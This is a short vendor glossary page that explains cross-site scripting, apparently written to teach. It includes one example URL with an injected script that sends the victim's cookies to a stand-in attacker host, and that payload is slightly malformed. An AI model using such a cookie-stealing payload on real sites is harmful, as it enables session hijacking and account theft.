[Term of the Day]: Cross-site scripting

[Term of the Day]: Cross-site scripting




Term of the Day

 

"Cross-Site Scripting"

 


What is Cross-Site Scripting?




Cross-site scripting, also known as XSS or CSS, is a security vulnerability that occurs when a cyber attacker injects a malicious script - generally in the form of browser-side scripts like HTML markup or JavaScript - in web applications.


How does it work?

In XSS vulnerability, the objective of cyber attacker is to steal the data of the user by running a malicious script in his browser which is injected on the website content which the user is using through different means.

Say, when a user searches for some text on a website, then the request is sent to the server in the form:


In the search result, the website returns the result along with what the user searched for like:

You searched for howto

If the search functionality is vulnerable to XSS, then the attacker can add the malicious script in the URL :

https://www.website.com/search=<script> document location=https://cyberattacker.com/log.php?c=’ +encodeURIComponent(document.cookie)</script>

When the user clicks on this link, it redirects to the malicious website, i.e. https://cyberattacker.com and all the browser data is directly sent to the cyber attacker’s computer resulting in the attacker stealing all the session token/cookies.

Learn more about XSS in this article.
        New to M365 Manager Plus?
        New to M365 Manager Plus?
          New to RecoveryManager Plus?
          New to RecoveryManager Plus?
            New to Exchange Reporter Plus?
            New to Exchange Reporter Plus?
              New to SharePoint Manager Plus?
              New to SharePoint Manager Plus?
                See all integrations
                New to ADManager Plus?

                  New to ADSelfService Plus?

                  Start your free trial





                            Related Products